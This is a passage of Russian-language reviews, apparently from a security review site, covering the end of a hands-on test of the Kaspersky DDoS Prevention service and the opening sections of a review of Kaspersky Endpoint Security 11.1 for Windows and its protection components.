и обратной доставки трафика путем проксирования.Далее мы сменили IP-адреса в DNS ресурса на предоставленные вендором, время перенаправления трафика действительно не превысило обещанных 60 секунд (значение текущего TTL в настройках хостинга). Для более тонкой фильтрации при атаке на HTTPS-трафик было решено передать сотрудникам KDP дублирующий TLS-сертификат и ключ нашего защищаемого ресурса, чтобы протестировать и эту технологию.После урегулирования всех формальностей трафик успешно начал маршрутизироваться через Центры очистки KDP, нам выделили учетную запись для входа в личный кабинет https://kdp.kaspersky.com. Итого с учетом всех коммуникаций процесс подключения уложился в пару-тройку дней. Рисунок 4. Доступ к порталу Kaspersky DDoS Prevention Для максимально эффективной фильтрации особенно сложных распределенных DDoS-атак начал собираться профиль статистики по защищаемому ресурсу, на это мы отвели две недели. Сайт функционировал в обычном режиме, каких-то отклонений замечено не было, трафик при этом проходил через Центры очистки KDP. Однако в случае обращения в KDP во время атаки возможно немедленное начало фильтрации (с немного более высокими рисками блокировки легитимных пользователей). Работа с клиентским порталом Kaspersky DDоS PreventionЗа две недели мы успели детально ознакомиться с интерфейсом, он оказался лаконичным, но в то же время все необходимые для функционирования сервиса защиты от DDоS-атак инструменты — под рукой. На главном экране доступна информация по поставленным под защиту ресурсам, а также исторические данные о зафиксированных аномалиях с всевозможными фильтрами. Рисунок 5. Информация об аномалиях в Kaspersky DDoS Prevention В разделе «Атаки» отображаются уже факты подтвержденного вредоносного воздействия на ресурсы, в отдельном мини-превью отображается график поступления трафика. Рисунок 6. Данные о реальных атаках в Kaspersky DDoS Prevention Получить полную информацию по конкретной атаке возможно перейдя по соответствующей ссылке. Помимо стандартных характеристик и более чем десятка различных временных и количественных графиков, порадовала возможность получить дополнительные полезные данные, например сведения по разбросу протоколов и географической активности. Рисунок 7. Дополнительные данные детализированной атаки в Kaspersky DDoS Prevention Сервис KDP позволяет в реальном времени отслеживать состояние защищаемых ресурсов с целью самостоятельно анализа параметров циркулирующего трафика. Все отображаемые сведения настраиваемые, а графики — интерактивные, что позволяет гибко подстроить систему под себя. Рисунок 8. Настройка визуализации обращений к ресурсам в Kaspersky DDoS Prevention Для получения сводки по спискам white/black-листов или атакам необходимо заказать соответствующий отчет в одноименном разделе. Принцип получения такого рода информации схож с заказом детализации звонков у операторов связи: после отправки заявки отчет автоматически формируется в течение нескольких минут и приходит на электронную почту в формате xls (для списков) и doc (для атак). Рисунок 9. Заказ отчетов в Kaspersky DDoS Prevention И если отчет по спискам адресов лаконичен и не представляет особого интереса, то на отчете по конкретной атаке (кстати, его также можно заказать прямо с детализированной странички об атаке) стоит остановиться отдельно. Рисунок 10. Детализированный отчет об атаке от Kaspersky DDoS Prevention Помимо сухих графиков и общей информации, отчет содержит детальное описание хода атаки, применяемых технологиях и типах вредоносного воздействия. Документ разбит на разделы, в каждом из которых даны необходимые текстовые пояснения. Пожалуй, такой отчет — настоящая мечта офицера ИБ, с ним смело можно идти на доклад к начальству.В последнем разделе «Настройки» отметим удобную систему оповещений. Кроме задания основных каналов (email и SMS), для оповещений по номеру телефона можно настроить расписание, например, «уведомлять только в рабочие часы». Напомним, что для KDP «Лаборатория Касперского» предоставляет клиентам API для возможности в том числе отправки данных об аномалиях и атаках в SIEM или SOC заказчика. Рисунок 11. Настройка оповещений в Kaspersky DDoS Prevention Процесс отражения реальной DDоS-атаки под защитой Kaspersky DDoS PreventionСогласитесь, процесс тестирования Kaspersky DDoS Prevention был бы неполным без проверки решения в боевых условиях. Мы основательно подготовились и сумели организовать распределенную тестовую атаку с применением различных методов. В первые же минуты после старта экспериментального вредоносного воздействия на портале сервиса начали фиксироваться аномалии. С небольшой задержкой они были детектированы как атаки и начали фильтроваться системой. Рисунок 12. Детект аномалии, выраженной в превышении количества IP/мин, в Kaspersky DDoS Prevention У нас уже стали появляться поводы для беспокойства, но еще через пару минут на почту пришло ожидаемое письмо. Рисунок 13. Письмо о детекции и митигации атаки от Kaspersky DDoS Prevention Надо отдать должное сервису KDP: начавшая было пропадать доступность нашего ресурса через несколько минут после успешного выявления атаки снова восстановилась, как и было обещано, без каких-либо действий с нашей стороны. Проверка доступности сайта под атакой не выявила отклонений от штатного режима работы ресурса, он открывается в браузере без задержек. Рисунок 14. Проверка доступности защищаемого ресурса при тестировании Kaspersky DDoS Prevention Вскоре после завершения нами тестовых «злодеяний» KDP оповестил по электронной почте о завершении DDoS-атаки и выслал подробный отчет о происходившем. Рисунок 15. Оповещение об окончании атаки и предоставлении отчета от Kaspersky DDoS Prevention Отчет действительно оказался весьма подробным, в нем отражена хронология и все типы примененных тестовых вредоносных воздействий. Рисунок 16. Ход тестовой атаки в отчете от Kaspersky DDoS Prevention В личном кабинете мы также подробно изучили и проанализировали собранные KDP данные о тестовой атаке. Рисунок 17. Подробная информация о тестовой атаке на портале Kaspersky DDoS Prevention Особенности лицензирования и сертификаты Kaspersky DDoS PreventionKaspersky DDoS Prevention лицензируется as a service (по подписке или как услуга) в соответствии с выбранным тарифным планом, который зависит от выбранной зафиксированной полосы пропускания трафика, перенаправляемого от защищаемых ресурсов на центры очистки «Лаборатории Касперского». На стоимость также влияет выбранный уровень технической поддержки, расширенные версии которой приобретаются отдельно.Kaspersky DDoS Prevention сертифицирован ФСТЭК России на соответствие РД НДВ по уровню 4 и ТУ. На текущий момент KDP — единственное решение класса защиты от DDoS-атак в реестре средств защиты информации ФСТЭК.Kaspersky DDoS Prevention присутствует в реестре отечественного ПО Минкомсвязи под регистрационным номером 186. ВыводыВ ходе тестирования Kaspersky DDoS Prevention справился со своей ключевой задачей — успешно детектировал и подавил реальную DDoS-атаку, позволив пользоваться защищаемым ресурсом в нормальном режиме. Процесс подключения сервиса не вызывает затруднений и укладывается в приемлемые сроки. Техническая поддержка оперативно реагирует на запросы, но у нас таковых, признаемся, практически не было, поскольку в комплекте с KDP поставляется вся необходимая документация, включая легко читаемые короткие памятки и FAQ.Базовая функциональность самого продукта с момента предыдущего с ним знакомства не сильно поменялась, однако «под капотом» KDP появилось немало современных технологий для более качественного детектирования DDоS-атак с применением в том числе машинного обучения. Также отметим расширение различных способов подключения и хороший SLA.Внимательный читатель отметит, что данный обзор вопреки ожиданиям не был усеян красивыми линейными графиками с демонстрацией пиков огромных объемов трафика. Эксперты «Лаборатории Касперского» в ходе нашего общения поделились несколькими интересными историями, в которых DDoS-атаки емкостью всего лишь 20 Гбит/с и меньше с легкостью «роняли» критичные ресурсы компаний. В этой связи основными векторами развития Kaspersky DDoS Prevention являются применение и совершенствование современных технологий внутри продукта, расширение возможностей интеграции с различными сервисами Threat Intelligence и наращивание уникальных экспертных компетенций. Выбор указанных приоритетных направлений позволит, насколько это возможно, не отставать от злоумышленников, которые постоянно совершенствуют свои техники нападения, используя как векторы также новые хайповые технологии, в том числе майнинг криптовалюты и блокчейн.ПреимуществаНаличие большого числа методов анализа и подавления атак, в том числе основанных на запатентованных технологиях.Понятный, не перегруженный интерфейс.Доступность различных способов подключения сервиса.Публичный и хорошо проработанный SLA.Доступность специалистов службы технической поддержки 24×7.Сертификат ФСТЭК России, единственный для решений данного класса.Присутствует в реестре отечественного ПО.НедостаткиОтсутствие каких-либо иных собственных или партнерских дополнительных сервисов (например, WAF, CDN или защита сайта).Нулевое число ручных тонких настроек сервиса, приводящее к полному ощущению black box.Нет возможности самостоятельно включить принудительную фильтрацию, однако рекомендуемый двухнедельный режим обучения довольно точно строит профиль нормального поведения трафика.Для возможности инспектировать шифрованный трафик необходимо предоставлять закрытый ключ.Автор благодарит за помощь в подготовке обзора специалистов «Лаборатории Касперского»:Александра Гутникова — системного аналитика Kaspersky DDoS PreventionЕкатерину Бадовскую — сервис-менеджера Kaspersky DDoS Prevention
Обзор Kaspersky Endpoint Security 11.1 для Windows
April 22, 2019, 12:08 am

Kaspersky Endpoint Security 11.1 от «Лаборатории Касперского» — решение для обеспечения многоуровневой защиты и реализации расширенных возможностей управления ИТ-средой организации. Ключевые возможности продукта: выявление аномалий в корпоративной сети в автоматическом режиме; защита от угроз даже без регулярных обновлений; нейтрализация попыток майнинга на рабочих устройствах; обнаружение вредоносных программ; предотвращение вторжений и настройка политик информационной безопасности с использованием облака — все это в единой веб-консоли управления защитой всех узлов сети. ВведениеСистемные требованияФункциональные возможности Kaspersky Endpoint SecurityРабота с Kaspersky Endpoint Security4.1. Режимы установки и запуска Kaspersky Endpoint Security4.2. Доступ к основным функциям Kaspersky Endpoint Security4.3. Базовая защита4.3.1. Защита от файловых угроз4.3.2. Защита от веб-угроз4.3.3. Защита от почтовых угроз4.3.4. Защита от сетевых угроз4.3.5. Сетевой экран4.4. Продвинутая защита4.4.1. Анализ поведения программ4.4.2. Защита от эксплойтов4.4.3. Предотвращение вторжений4.4.4. Откат вредоносных действий4.5. Контроль безопасности4.5.1. Контроль программ4.5.2. Контроль устройств4.5.3. Веб-контроль4.5.4. Адаптивный контроль аномалий4.6. Отчетность в Kaspersky Endpoint Security4.7. Настройка уведомлений в Kaspersky Endpoint SecurityВыводы Введение«Лаборатория Касперского» широко известна как компания, которая специализируется на защите ИТ-сред от различных киберугроз, включая компьютерные вирусы, мошеннические и сетевые атаки, спам и пр. Компания входит в число ведущих мировых производителей систем защиты конечных точек (Endpoint Protection Platform) и имеет в своем арсенале продукты как для защиты домашних компьютеров, так и серверов/рабочих станций под управлением всех популярных операционных систем (ОС).Традиционная популярность Microsoft Windows в корпоративной среде имеет оборотную сторону — именно эта операционная система чаще всего избирается киберпреступниками в качестве основной цели для атак. Практика показывает, что встроенных в Windows функций безопасности недостаточно для защиты бизнеса от сложных и неизвестных угроз. На роль решения, способного закрыть имеющиеся бреши в системе защиты, претендует продукт Kaspersky Endpoint Security для Windows. Его основная задача — защита конечных устройств корпоративных пользователей.Ранее мы уже публиковали материалы по различным продуктам «Лаборатории Касперского». Например, Обзор Kaspersky Threat Management and Defense, Обзор Kaspersky Endpoint Security Cloud и др. Но с момента последнего Обзора Kaspersky Endpoint Security для Windows утекло много воды, и теперь пришло время освежить знания о возможностях этого продукта. Тем более, что появился значимый повод.Коммерческий релиз Kaspersky Endpoint Security для Windows версии 11 состоялся около года назад. Выпуск этой версии у многих ассоциируется прежде всего с концепцией HuMachine Intelligence, представляющей собой взаимоувязанную совокупность следующих технологий:технология оперативной обработки больших массивов данных о вредоносных, чистых и потенциально вредоносных объектах для извлечения знаний об угрозах из массы накопленных данных;технологии статического и динамического детектирования на базе машинного обучения;технология детектирования средствами экспертных систем с принятием итогового решения исследователями «Лаборатории Касперского».14 марта 2019 года была выпущена версия 11.1, содержащая ряд существенных нововведений. В основу Kaspersky Endpoint Security 11.1 для Windows положены технологии нового поколения для надежной защиты данных за счет адаптивного контроля аномалий, автоматической установки исправлений, защиты файловых серверов, управления мобильными устройствами, шифрования, защиты от программ-шифровальщиков и других механизмов, подробнее о которых — в нашем материале. Системные требованияКорректное функционирование Kaspersky Endpoint Security 11.1 предполагает соответствие компьютера следующим требованиям к программно-аппаратной платформе:наличие 2 ГБ свободного места на жестком диске;наличие оперативной памяти в объеме:для 32-разрядной операционной системы — 1 ГБ;для 64-разрядной операционной системы — 2 ГБ.использование процессора Intel Pentium 1 ГГц (или совместимый аналог с поддержкой инструкций SSE2);В продукте поддерживается довольно внушительный список операционных систем:Microsoft Windows 10 Home / Pro / Education / Enterprise x86 / х64;Microsoft Windows 8.1 Pro / Enterprise x86 / х64;Microsoft Windows 8 Pro / Enterprise x86 / х64;Microsoft Windows 7 Home / Professional / Enterprise x86 / х64 SP1 и выше;Microsoft Windows Server 2019 Essentials / Standard х64;Microsoft Windows Server 2016 х64;Microsoft Windows Server 2012 R2 Foundation / Essentials / Standard х64;Microsoft Windows Server 2012 Foundation / Essentials / Standard х64;Microsoft Windows MultiPoint Server 2011 x64;Microsoft Small Business Server 2011 Essentials / Standard х64;Microsoft Windows Server 2008 R2 Foundation / Standard / Enterprise х64 SP1;Microsoft Windows Server 2008 Standard / Enterprise х64 SP2;Microsoft Small Business Server 2008 Standard / Premium x64.Kaspersky Endpoint Security 11.1 может работать и на всех широко распространенных виртуальных платформах:VMware Workstation 14;VMware ESXi 6.5 U1;Microsoft Hyper-V 2016 Server;Microsoft Hyper-V 2019 Server;Citrix XenServer 7.2;Citrix XenDesktop 7.17;Citrix XenApp 7.17;Citrix Provisioning Services 7.17. Функциональные возможности Kaspersky Endpoint SecurityОсновное назначение Kaspersky Endpoint Security 11.1 состоит в обеспечении комплексной защиты компьютера от различных угроз безопасности информации, включая блокирование сетевых угроз и препятствование мошеннической деятельности.Сразу обращает на себя внимание тот факт, что для каждого типа известных угроз в продукте предусмотрен отдельный компонент, управляемый независимо от остальных. Этот подход поневоле мотивирует производить настройку механизмов безопасности в пошаговом режиме, что делает задачу администрирования весьма прозрачной.В продукте предусмотрено две стратегии противодействия функционированию вредоносных программ:перманентная защита, реализуемая различными компонентами программы в соответствии с заданным уровнем;периодическое сканирование системы на предмет наличия вирусов и иных потенциально опасных программ.Периодическое сканирование представляет собой второй эшелон обороны, поскольку позволяет воспрепятствовать возможности распространения вирусов, которые по какой-либо причине не были обнаружены основными компонентами — в частности, вследствие заданного низкого уровня защиты.В целях поддержания актуального состояния защитной инфраструктуры Kaspersky Endpoint Security 11.1 требует и предусматривает возможность своевременного обновления баз и модулей, используемых в работе программы. По умолчанию программа обновляется автоматически, но при необходимости можно в любое время обновить базы и модули программы и вручную.Компоненты Kaspersky Endpoint Security 11.1 реализуют следующие основные функциональные возможности:адаптивный контроль аномалий — существенное преимущество новой версии продукта, объединяющее технологии на основе алгоритмов машинного обучения и аналитики угроз. Компонент анализирует поведение пользователей и запоминает сценарии их работы и типичные процессы, которые они совершают. Как только система фиксирует какое-либо отклонение от привычной активности на устройствах, она блокирует аномальное действие и оповещает системного администратора о подозрении на угрозу;контроль программ — заключается в непрерывном мониторинге и управлении попытками запуска программ пользователями;контроль устройств — состоит в задании ограничений доступа к устройствам — источникам информации (жесткие диски, CD/DVD-диски пр.), передачи информации (например, модемы), преобразования информации (например, принтеры), а также интерфейсам подключения этих устройств к компьютеру (например, USB, Bluetooth);веб-контроль — обеспечивает возможность задания гибких ограничений доступа к веб-ресурсам для различных групп пользователей;анализ поведения — предназначен для получения данных о действиях программ на компьютере и предоставления этих данных другим компонентам защиты с целью повышения эффективности работы последних;защита от эксплойтов — позволяет следить за исполняемыми файлами, которые запускаются уязвимыми программами, и при необходимости блокировать попытки запуска;предотвращение вторжений — обеспечивает регистрацию операций, выполняемых программами, и управление их функционированием в зависимости от отнесения программы к той или иной группе;откат вредоносных действий — как легко догадаться, в рамках реализации данной функции Kaspersky Endpoint Security 11.1 выполняет восстановление после действий, произведенных в ОС вредоносными программами;защита от файловых угроз — позволяет избежать заражения файловой системы компьютера;защита от веб-угроз — обеспечивает проверку трафика, поступающего на компьютер по прикладным протоколам, а также выявляет возможные связи веб-адресов с вредоносными или фишинговыми;защита от почтовых угроз — обеспечивает проверку сообщений электронной почты на наличие в них вредоносных программ;защита от сетевых угроз — состоит в слежении за входящим сетевым трафиком, выявлении и блокировании активности, характерной для сетевых атак;сетевой экран — обеспечивает защиту данных пользователя во время подключения к сети согласно сетевым правилам программ и сетевым пакетным правилам;поставщик AMSI-защиты — позволяет проверять объекты по запросы от сторонних приложений;индикатор уровня защиты для политики – уведомляет об отключении критически важных компонентов защиты;защита от атак BadUSB — позволяет предотвратить подключение к компьютеру зараженных USB-устройств, имитирующих клавиатуру.В продукте реализована функциональность шифрования файлов, которая позволяет шифровать файлы и папки, хранящиеся на локальных дисках компьютера. Функциональность полнодискового шифрования позволяет шифровать жесткие и съемные диски, включая шифрование ОС. При этом доступны технологии:шифрования диска Kaspersky;шифрования диска Bitlocker.Кроме того, можно отметить следующие улучшения Kaspersky Endpoint Security 11.1:интеграция с Windows Defender Security Center;поддержка Antimalware Scan Interface (AMSI);поддержка Windows Subsystem for Linux (WSL);защита от атак, которые используют уязвимости в ARP-протоколе для подделки MAC-адреса устройства.Kaspersky Endpoint Security 11.1 обеспечивает возможность удаленного управления через специальную программу Kaspersky Security Center, которая позволяет удаленно запускать и останавливать продукт на клиентских компьютерах, управлять задачами и настраивать параметры работы программы. В составе Kaspersky Security Center предусмотрено специальное веб-приложение Kaspersky Security Center 11.1 Web Console для централизованного администрирования системы защиты сети организации. С помощью веб-консоли можно:устанавливать программы «Лаборатории Касперского» на устройства сети;управлять установленными программами;просматривать отчеты о состоянии системы безопасности.Очевидно, что веб-версия консоли управления системой безопасности повышает оперативность выполнения функций администрирования и реагирования на инциденты в корпоративной сети организации: для получения доступа к инструментарию управления достаточно открыть страницу в браузере, предварительная установка программного обеспечения не требуется. Поскольку для получения доступа к функциям администрирования достаточно только браузера, отпадают ограничения на поддерживаемые аппаратные платформы и операционные системы. Например, при необходимости администратор вполне может работать с мобильного устройства за пределами организации.Kaspersky Endpoint Security 11.1 включает ряд функций служебного характера, которые помогают поддерживать продукт в актуальном состоянии и расширить возможности его использования:формирование отчетов для каждого компонента с возможностью отправки на изучение в «Лабораторию Касперского»;ведение хранилища копий вылеченных и удаленных файлов вредоносных программ;уведомление пользователей о текущем состоянии системы защиты различными способами.При этом многие рутинные процессы автоматизированы, что позволяет сконцентрироваться на стратегических задачах, вместо того чтобы тратить время и ресурсы на механически повторяемые операции. Работа с Kaspersky Endpoint SecurityРежимы установки и запуска Kaspersky Endpoint SecurityKaspersky Endpoint Security 11.1 для Windows можно установить локально (непосредственно на компьютере пользователя) или удаленно с рабочего места администратора.Локальную установку Kaspersky Endpoint Security для Windows можно выполнить в одном из следующих режимов:в интерактивном режиме с помощью мастера установки программы;интерактивный режим требует участия пользователя в процессе установки;в тихом режиме из командной строки.Окно мастера установки программы выглядит привычным образом. Рисунок 1. Окно мастера локальной установки Kaspersky Endpoint Security 11.1 Как обычно для программ подобного типа, можно выбрать компоненты, которые требуется установить на компьютер. Рисунок 2. Окно выбора компонентов при локальной установке Kaspersky Endpoint Security 11.1 В случае установки программы в тихом режиме участие пользователя не требуется.Удаленную установку программы на компьютеры сети можно выполнить с помощью:Kaspersky Security Center / Kaspersky Security Center 11 Web Console;редактора управления групповыми политиками Microsoft Windows;System Center Configuration Manager.Процедуры удаленного развертывания Kaspersky Endpoint Security 11.1 интуитивно понятны, не требуют наличия у администратора каких-либо особенных знаний или навыков. Особенности и ограничения, связанные с установкой программы, в целом не представляются существенными, и очень подробно описаны в соответствующем разделе справочной информации по продукту. Большинство приведенных ограничений типично для ПО средств защиты информации. Например, перед началом установки продукта рекомендуется закрыть все работающие программы, а в ряде сценариев требуется выполнить перезагрузку системы после установки. Кроме того, имеется ряд нюансов, которые касаются процедур обновления при переходе на Kaspersky Endpoint Security 11.1 с более старых версий продукта.Запуск программы возможен в следующих режимах:автоматическом;ручном.Под автоматическим запуском программы подразумевается запуск Kaspersky Endpoint Security 11.1, который выполняется без участия пользователя после старта операционной системы. Этот вариант запуска программы установлен по умолчанию.В первый раз программа Kaspersky Endpoint Security 11.1 запускается автоматически после ее установки.Загрузка антивирусных баз Kaspersky Endpoint Security 11.1 после запуска операционной системы занимает до двух минут, в зависимости от производительности (технических возможностей) компьютера. В течение этого времени уровень защиты компьютера снижен. Загрузка антивирусных баз при запуске программы Kaspersky Endpoint Security 11.1 в уже загруженной операционной системе не вызывает снижения уровня защиты компьютера.Стоит отметить, что, когда Kaspersky Security Center загружает обновления с серверов обновлений «Лаборатории Касперского», он оптимизирует трафик с помощью файлов различий. Можно включить использование файлов различий устройствами (Серверов администрирования, точек распространения и клиентских устройств), которые принимают обновления с других устройств в сети. Файл различий описывает различия между двумя версиями файлов базы или программного модуля. Использование файлов различий сохраняет трафик внутри сети организации, так как файлы различий занимают меньше места, чем полные файлы баз и программных модулей.Доступ к основным функциям Kaspersky Endpoint SecurityСогласно декларации производителя, Kaspersky Endpoint Security 11.1 предоставляет весьма широкий набор возможностей по обеспечению защиты от угроз безопасности информации.Как правило, для программ, наделенных богатым набором функций, ахиллесовой пятой становится проблема удобной организации элементов пользовательского интерфейса таким образом, чтобы сохранить разумный баланс между двумя возможными крайностями:перегрузка интерфейса за счет размещения всех элементов управления на одном уровне в доступности — для сверхбыстрого доступа к компонентам без необходимости прокладывания кротовых нор через вложенные пункты меню в попытке добраться до нужного компонента;выстраивание лабиринтов для переходов между иерархическими уровнями с целью создать эффект простоты за счет использования относительно малого количества элементов управления на каждом из многочисленных уровней вложенности.Стоит признать, что разработчики «Лаборатории Касперского» сумели отыскать элегантное решение проблемы.Во-первых, извлечен безусловный максимум пользы из зачастую недооцененного инструмента «значок уведомлений панели задач Microsoft Windows». Многие производители пренебрегают тем потенциалом, которые в нем заложен, используя его лишь для проформы и наделяя фиктивными свойствами из общих соображений.В Kaspersky Endpoint Security 11.1 значок с одной стороны служит индикатором, меняя свой облик в зависимости от обстановки в системе: работа всех компонентов защиты программы включена. в работе программы произошли важные события, на которые нужно обратить внимание. Например, выключен компонент Защита от файловых угроз, базы программы устарели. в работе Kaspersky Endpoint Security произошли события критической важности. Например, сбой в работе компонента, повреждение баз программы.Кроме того, широко задействовано и контекстное меню значка — с помощью него можно в том числе:открыть окно «Настройка», посредством которого вносятся изменения в параметры программы, установленные по умолчанию;приостановить и возобновить выполнение функций защиты и контроля;завершить работу программы путем ее выгрузки из оперативной памяти компьютера.Ну и наконец, что наиболее естественно и закономерно, из контекстного меню Kaspersky Endpoint Security для Windows можно открыть главное окно программы, и здесь мы с полным основанием переходим ко второму аспекту анонсированного претворения в жизнь концепции эргономичного пользовательского интерфейса.Разработчики применили компромиссное решение по организации элементов пользовательского интерфейса главного окна приложения в виде гармоничного смешения двух техник: блочной и иерархической.А именно:элементы, соответствующие базовым направлениям использования программы, представлены на главном окне в виде блоков (рисунок 3); Рисунок 3. Главное окно Kaspersky Endpoint Security 11.1 в свою очередь, для размещения множества элементов настройки в рамках выбранного базового направления (блока) используется классическая древовидная структура (рисунок 4). Рисунок 4. Древовидная организация размещения компонентов настройки Kaspersky Endpoint Security 11.1 Таким образом, достигается совмещение удобств плоской системы доступа к группам функций, создающей эффект пульта управления, и иерархической организации для работы с атомарными конфигурационными компонентами.Среди прочего из главного окна доступны следующие основные функциональные блоки, задающие общее направление работы с программой:«Технологии обнаружения угроз». С помощью данного блока можно ознакомиться с систематизированной по технологиям сводкой: справа от названия каждой из технологий обнаружения угроз отображается количество угроз, обнаруженных с помощью этой технологии. При этом возможны следующие ситуации:если, как в нашем случае, активных угроз не обнаружено, при нажатии на блок открывается окно, в котором приведено краткое описание технологий обнаружения угроз, а также статус и глобальная статистика инфраструктуры облачных служб Kaspersky Security Network (рисунок 5); Рисунок 5. Статистическая информация в контексте технологий обнаружения угроз Kaspersky Endpoint Security 11.1 если же надпись в блоке сигнализирует о наличии активных угроз, то при нажатии на блок открывается окно «Активные угрозы», в котором приведен список событий, связанных с зараженными файлами, которые по каким-либо причинам не были обработаны;«Компоненты защиты». В окне, отображающемся при выборе данного блока, можно посмотреть статус работы установленных компонентов. Также из этого окна можно для любого из установленных компонентов, кроме компонентов шифрования, открыть подраздел блока «Настройка», содержащий параметры этого компонента; Рисунок 6. Полный состав компонентов защиты Kaspersky Endpoint Security 11.1 «Задачи». Здесь можно управлять работой задач Kaspersky Endpoint Security 11.1, посредством которых обеспечивается актуальность баз и модулей программы, выполняется проверка на присутствие вирусов или других программ, представляющих угрозу, а также выполняется проверка целостности;«Отчеты». При нажатии на кнопку открывается окно «Отчеты», содержащее информацию о событиях, произошедших в ходе работы программы в целом, работы отдельных компонентов и выполнения задач;«Хранилища». При нажатии на кнопку открывается окно «Резервное хранилище». В этом окне можно просмотреть список копий зараженных файлов, которые были удалены в ходе работы программы. Резервное хранилище — это список резервных копий файлов, которые были удалены или изменены в процессе лечения. Резервная копия — копия файла, которая создается до «лечения» или удаления этого файла. Резервные копии файлов хранятся в специальном формате в каталоге ProgramData\Kaspersky Lab\KES\QB и не представляют опасности для системы. Можно настраивать следующие параметры резервного хранилища:максимальный срок хранения копий файлов в резервном хранилище. По умолчанию максимальный срок хранения копий файлов в резервном хранилище составляет 30 дней. По истечении максимального срока хранения Kaspersky Endpoint Security 11.1 удаляет наиболее старые файлы из резервного хранилища. Можно отменить ограничение по времени или изменить максимальный срок хранения файлов;максимальный размер резервного хранилища. По умолчанию максимальный размер резервного хранилища составляет 100 МБ. После достижения максимального размера Kaspersky Endpoint Security 11.1 автоматически удаляет наиболее старые файлы из резервного хранилища таким образом, чтобы не превышался его максимальный размер. Опять-таки можно изменить максимальный размер резервного хранилища или отменить соответствующее ограничение вовсе.Рассмотрим подробнее порядок использования основных функциональных возможностей Kaspersky Endpoint Security 11.1.Базовая защитаЗащита от файловых угрозИспользование Kaspersky Endpoint Security 11.1 позволяет избежать заражения файловой системы компьютера. По умолчанию компонент «Защита от файловых угроз» запускается при старте Kaspersky Endpoint Security 11.1, постоянно размещается в оперативной памяти и проверяет открываемые и запускаемые файлы на компьютере и на присоединенных дисках на наличие в них вредоносных программ.При обнаружении угрозы в файле Kaspersky Endpoint Security 11.1 выполняет следующие действия:определяет тип обнаруженного в файле объекта (вирус, троянская программа или что-то другое);выводит на экран уведомление о вредоносном объекте, обнаруженном в файле (если настроены уведомления), и выполняет над файлом заданное действие.Можно настроить автоматическую приостановку функции защиты от файловых угроз в указанное время или во время работы с определенными программами, что, видимо, следует расценивать как экстренную меру. Рисунок 7. Настройка процедур защиты от файловых угроз в Kaspersky Endpoint Security 11.1 В рамках настройки работы компонента «Защита от файловых угроз» можно выполнить следующие действия:изменить уровень безопасности;изменить действие, которое компонент «Защита от файловых угроз» выполняет при обнаружении зараженного файла;расширить или сузить область защиты, добавив или удалив объекты проверки или изменив тип проверяемых файлов. Рисунок 8. Настройка области защиты от файловых угроз в Kaspersky Endpoint Security 11.1 Во время своей работы компонент «Защита от файловых угроз» использует метод проверки «Машинное обучение и сигнатурный анализ». В процессе сигнатурного анализа найденный объект сравнивается с записями в антивирусных базах программы.Кроме того, чтобы повысить эффективность защиты, можно использовать эвристический анализ. В процессе эвристического анализа анализируется активность, которую объекты производят в системе. Эвристический анализ позволяет обнаруживать вредоносные объекты, записей о которых еще нет в антивирусных базах программы.Есть возможность оптимизировать проверку файлов, а именно сократить время проверки и увеличить скорость работы Kaspersky Endpoint Security 11.1 за счет настройки таким образом, чтобы проверялись только новые файлы и те файлы, которые изменились с момента их предыдущего анализа. Защита от веб-угрозКомпонент «Защита от веб-угроз» защищает информацию, поступающую на компьютер пользователя и отправляемую с него, а также устанавливает принадлежность ссылок к вредоносным или фишинговым веб-адресам.Компонент «Защита от веб-угроз» Kaspersky Endpoint Security 11.1 сканирует зашифрованный трафик в поисках угроз, которые пытаются использовать зашифрованные каналы передачи данных для незаметного проникновения в систему.Если веб-страница или файл, к которым обращается пользователь, содержат вредоносный код, программа выполняет действие, заданное в параметрах компонента «Защита от веб-угроз». Рисунок 9. Настройка процедур защиты от веб-угроз в Kaspersky Endpoint Security 11.1 С помощью процедуры настройки можно изменить уровень безопасности веб-трафика путем выбора одного из предустановленных уровней безопасности или настроить уровень безопасности веб-трафика самостоятельно.Kaspersky Endpoint Security 11.1 позволяет сформировать список веб-адресов, содержанию которых доверяет организация. Компонент «Защита от веб-угроз» не будет анализировать информацию, поступающую с доверенных веб-адресов, на присутствие вирусов и других программ, представляющих угрозу. Такая возможность может быть использована, например, в том случае, если компонент «Защита от веб-угроз» препятствует загрузке файла с веб-сайта, безопасность которого не подвергается сомнению. Защита от почтовых угрозKaspersky Endpoint Security 11.1 проверяет входящие и исходящие сообщения электронной почты на наличие в них вредоносов. Соответствующий компонент запускается при старте Kaspersky Endpoint Security 11.1, постоянно находится в оперативной памяти компьютера и проверяет все сообщения, получаемые или отправляемые по протоколам POP3, SMTP, IMAP, MAPI и NNTP. При обнаружении угрозы в сообщении электронной почты ему присваивается статус «Заражен», определяется тип обнаруженного объекта, сообщение блокируется, на экран выводится уведомление об обнаруженном объекте и выполняется действие, заданное в параметрах компонента «Защита от почтовых угроз». Рисунок 10. Настройка процедур защиты от почтовых угроз в Kaspersky Endpoint Security 11.1 Компонент взаимодействует с почтовыми клиентами, установленными на компьютере. Для почтового клиента Microsoft Office Outlook предусмотрено встраиваемое расширение, позволяющее производить более тонкую настройку проверки сообщений.Следует отметить ограничение, связанное с тем, что при работе с почтовым клиентом Mozilla Thunderbird компонент «Защита от почтовых угроз» не проверяет на вирусы сообщения, передаваемые по протоколу IMAP, в случае если используются фильтры, перемещающие сообщения из папки Входящие. Защита от сетевых угрозKaspersky Endpoint Security 11.1 позволяет отслеживает во входящем сетевом трафике активность, характерную для сетевых атак. Обнаружив попытку сетевой атаки на компьютер пользователя, Kaspersky Endpoint Security 11.1 блокирует сетевую активность атакующего компьютера. После этого на экран выводится уведомление о том, что была попытка сетевой атаки, с указанием информации об атакующем компьютере.Список сетевых атак, которые обнаруживает компонент «Защита от сетевых угроз», пополняется в процессе обновления баз и модулей программы. Рисунок 11. Настройка процедур защиты от сетевых угроз в Kaspersky Endpoint Security 11.1 Можно выполнить следующие действия для настройки работы компонента «Защиты от сетевых угроз»:настроить параметры блокирования атакующего компьютера. Обнаружив попытку сетевой атаки, сетевая активность атакующего компьютера блокируется в течение заданного времени;сформировать список адресов для исключения из блокирования. Сетевой экранСетевой экран защищает данные на компьютере за счет блокирования угроз ОС, когда компьютер подсоединен к интернету или к локальной сети. Сетевой экран позволяет обнаружить все сетевые соединения на компьютере и отобразить список их IP-адресов с указанием статуса сетевого соединения по умолчанию.Этот компонент фильтрует всю сетевую активность в соответствии с сетевыми правилами, настройка которых позволяет задать нужный уровень защиты компьютера, от полной блокировки доступа в интернет для всех программ до разрешения неограниченного доступа:сетевые пакетные правила — используются для задания ограничений на сетевые пакеты независимо от программы и входящую/исходящую сетевую активность по определенным портам выбранного протокола передачи 